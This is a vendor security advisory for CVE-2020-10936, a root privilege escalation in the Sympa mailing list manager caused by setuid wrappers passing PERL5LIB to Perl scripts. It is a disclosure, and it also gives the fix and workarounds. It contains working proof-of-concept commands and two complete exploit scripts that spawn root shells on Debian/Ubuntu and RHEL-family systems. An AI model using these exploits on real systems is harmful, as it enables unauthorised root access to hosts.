[CVE-2020-10936] SYMPA Privileges escalation to root

We found a way to escalate our privileges to root, exploiting a vulnerability in the way that a setsuid binary can be abused to load malicious Perl libraries.

mai 13, 2020

Description

Sympa is an electronic mailing list manager.

It is used to automate list management functions such as subscription, moderation and management of archives. Sympa also manages sending of messages to the lists, and makes it possible to reduce the load on the system. Provided that you have enough memory on your system, Sympa is especially well adapted for big lists.

Threat

Privilege escalation to root

Vulnerability records

CVE ID: CVE-2020-10936

Access Vector: local

Security Risk: high

Vulnerability: CWE-269

CVSS Base Score: 8.8

CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Details

When installing sympa on CentOS/Fedora/RHEL, several binaries are set with the suid/sgid bit:

[sysdream@localhost ~]$ ls -lah /usr/libexec/sympa/
[...]
-rwsr-xr-x.  1 sympa sympa  16K 23 janv. 09:46 bouncequeue
-rwsr-xr-x.  1 sympa sympa  16K 23 janv. 09:46 familyqueue
-rwsr-xr-x.  1 sympa sympa  16K 23 janv. 09:46 queue
-rwsr-x---.  1 root  sympa  16K 23 janv. 09:46 sympa_newaliases-wrapper
-rwsr-sr-x.  1 sympa sympa  16K 23 janv. 09:46 sympa_soap_server-wrapper.fcgi
-rwsr-sr-x.  1 sympa sympa  16K 23 janv. 09:46 wwsympa-wrapper.fcgi

As you can see, only the sympa_newaliases-wrapper binary is suid root.

However, this binary is not world-executable. Only users from the sympa group are allowed to execute this program, and this is not our case.

So, in order to be able to execute this program, we need to perform a privileges escalation to the sympa user.

If we look at the wwsympa-wrapper.fcgi setuid/setgid sympa source code, we can see that the main function execute the WWSYMPA binary (wwsympa.fcgi) as the sympa user and group.

#include <unistd.h>

int main(int argn, char **argv, char **envp) {
    setreuid(geteuid(),geteuid()); // Added to fix the segfault
    setregid(getegid(),getegid()); // Added to fix the segfault
    argv[0] = WWSYMPA;
    return execve(WWSYMPA,argv,envp);
}

The vulnerability is caused by the envp variable that is passed to the WWSYMPA binary.

It means that every environment variable defined when running the wwsympa-wrapper.fcgi is passed to wwsympa.fcgi.

As wwsympa.fcgi is interpreted as a PERL script, the interpreter will look at the PERLLIB and PERL5LIB environment variable to look for Perl modules.

So, if we can create a malicious Perl module, the PERL interpreter will look in the PERLLIB and PERL5LIB path, and if a module name matches, it will load it.

We came up with the following POC that allows us to escalate our privileges as sympa, by creating a malicious Config perl module:

$ id
uid=1000(sysdream) gid=1000(sysdream) groupes=1000(sysdream),10(wheel) contexte=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
$ mkdir /tmp/poc
$ echo 'exec("/bin/bash");' > /tmp/poc/Config.pm
$ PERL5LIB=/tmp/poc PERLLIB=/tmp/poc /usr/libexec/sympa/wwsympa-wrapper.fcgi
bash-5.0$ id
uid=977(sympa) gid=975(sympa) groupes=975(sympa),10(wheel),1000(sysdream) contexte=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

As we are now the sympa user, we are allowed to execute the sympa_newaliases-wrapper suid-root binary. Let’s take a look at the source code:

#include <unistd.h>

int main(int argn, char **argv, char **envp) {
    setreuid(geteuid(),geteuid());
    setregid(getegid(),getegid());
    argv[0] = SYMPA_NEWALIASES;
    return execve(SYMPA_NEWALIASES, argv, envp);
}

SYMPA_NEWALIASES point to sympa_newaliases.pl, which is also a Perl script!

If we use the same POC as before, we could gain root privilege escalation as root.

bash-5.0$ id
uid=977(sympa) gid=975(sympa) groupes=975(sympa),10(wheel),1000(sysdream) contexte=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
bash-5.0$ echo $PERLLIB
/tmp/poc
bash-5.0$ echo $PERL5LIB
/tmp/poc
bash-5.0$ /usr/libexec/sympa/sympa_newaliases-wrapper
[root@localhost poc]# id
uid=0(root) gid=975(sympa) groupes=975(sympa),10(wheel),1000(sysdream) contexte=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[root@localhost poc]# whoami
root

On Debian/Ubuntu systems, /usr/lib/sympa/bin/sympa_newaliases-wrapper is already suid root and world-executable, which means that we don’t have to escalate to sympa in order to gain root privileges:

user@debian:~$ ls -lah /usr/lib/sympa/bin/sympa_newaliases-wrapper
-rwsr-xr-x 1 root root 14K janv. 20  2019 /usr/lib/sympa/bin/sympa_newaliases-wrapper
user@debian:~$ mkdir /tmp/poc && echo 'exec("/bin/sh")' >> /tmp/poc/Config.pm
user@debian:~$ PERL5LIB=/tmp/poc PERLLIB=/tmp/poc /usr/lib/sympa/bin/sympa_newaliases-wrapper 
# whoami
root
#

Proof of Concept : Root privilege escalation – Debian / Ubuntu

Standard user to root privileges:

#!/bin/sh
echo "[+] SYMPA on Debian/Ubuntu root privilege escalation exploit - n.chatelain -at- sysdream.com"
echo "[~] Exploit setup."
EXPLOITDIR=$(mktemp -d)
EXPLOITFILE="$EXPLOITDIR/Config.pm"
chmod 777 $EXPLOITDIR
echo 'exec("/bin/sh");' > $EXPLOITFILE
export PERLLIB=$EXPLOITDIR
export PERL5LIB=$EXPLOITDIR
echo "[+] Triggering exploit."
/usr/lib/sympa/bin/sympa_newaliases-wrapper

Output:

user@debian:~$ bash poc.sh 
[+] SYMPA on Debian/Ubuntu root privilege escalation exploit - n.chatelain -at- sysdream.com
[~] Exploit setup.
[+] Triggering exploit.
# whoami
root

Proof of Concept : Root privilege escalation – Fedora / CentOS / RedHat

Standard user, to sympa, to root privilege escalation:

#!/bin/sh
echo "[+] SYMPA on Fedora/CentOS/RHEL root privilege escalation exploit - n.chatelain -at- sysdream.com"
echo "[~] Exploit setup."
EXPLOITDIR=$(mktemp -d)
EXPLOITFILE="$EXPLOITDIR/Config.pm"
chmod 777 $EXPLOITDIR
cat > $EXPLOITFILE <<"EOL"
my $sympauser = "sympa";
my $pwuid = getpwuid( $< );
$elevate = $pwuid eq $sympauser;
$root = $pwuid eq "root";
if ($elevate == 1)
{
    print "[+] Running as service user, elevating privileges as root...\n";
    exec("/usr/libexec/sympa/sympa_newaliases-wrapper");
}
else {
    if ($root == 1)
    {
        print "[+] Running as root, popping shell.\n";
        exec("/bin/sh");
    }
    else
    {
        print "[!] Not running as root/sympa, exploit failed.\n";
    }
}
EOL
export PERLLIB=$EXPLOITDIR
export PERL5LIB=$EXPLOITDIR
echo "[+] Triggering exploit."
/usr/libexec/sympa/wwsympa-wrapper.fcgi

Output:

[user@localhost exploit]$ bash poc.sh 
[+] SYMPA on Fedora/CentOS/RHEL root privilege escalation exploit - n.chatelain -at- sysdream.com
[~] Exploit setup.
[+] Triggering exploit.
[+] Running as service user, elevating privileges as root...
[+] Running as root, popping shell.
sh-5.0# whoami
root

Affected versions

Sympa 6.2.54

Workarounds

Sympa suggests the following workarounds:

Stop using FastCGI wrappers and remove them
1. Modify configuration for HTTP server so that it will not use the
  wrapper. For detailed instructions see:
  - Configure HTTP server: Instruction by HTTP servers
    https://sympa-community.github.io/manual/install/configure-http-server.html#instruction-by-http-servers
2. Remove executable files of FastCGI wrappers:
  - $EXECCGIDIR/wwsympa-wrapper.fcgi
  - $EXECCGIDIR/sympa_soap_server-wrapper.fcgi
No workaround has been known about some obsoleted systems requiring
FastCGI wrapper, in particular Apache HTTP Server 2.2.x and earlier.

Solution

Sympa suggests to:

Upgrade to version 6.2.56
- Source distribution: sympa-6.2.56.tar.gz
- Binary distributions: Check release information by
  distributors.

or, if you have installed Sympa using earlier version of source distribution,

Apply a patch to the source, recompile wrappers and renistall them:
- Patch for sympa-6.2 or later: sympa-6.2.54-sa-2020-002.patch

Timeline

2020-03-12 Initial discovery
2020-03-24 Contacting the developpers
2020-03-24 Aknownledgment from the Sympa security team
2020-04-03 Feedback with a proposed patch, but not to be applied to all SUID binaries.
2020-04-16 We confirm that the patch seems efficient, but it would be better to apply it on all binaries.
2020-04-24 Response: setuid-sympa wrappers are deprecated, so they should not be used in the first place.
2020-05-04 Follow-up e-mail about a release date for the patch and that our disclosure target is on 2020-05-13.
2020-05-18 No reply, last follow-up.
2020-05-21 Reply with draft advisory.
2020-05-25 Disclosure with provided solutions and workarounds.

Credits to the Sympa team for the quick and efficient handling of our report.

In particular, thanks to Soji Ikeda for his work and patch development.

Credits

Nicolas Chatelain, Sysdream (n.chatelain -at- sysdream -dot- com)

Audit

Conseil

Former

Catalogue

Cyber-entrainement

SOC Managé

Sécuriser le SI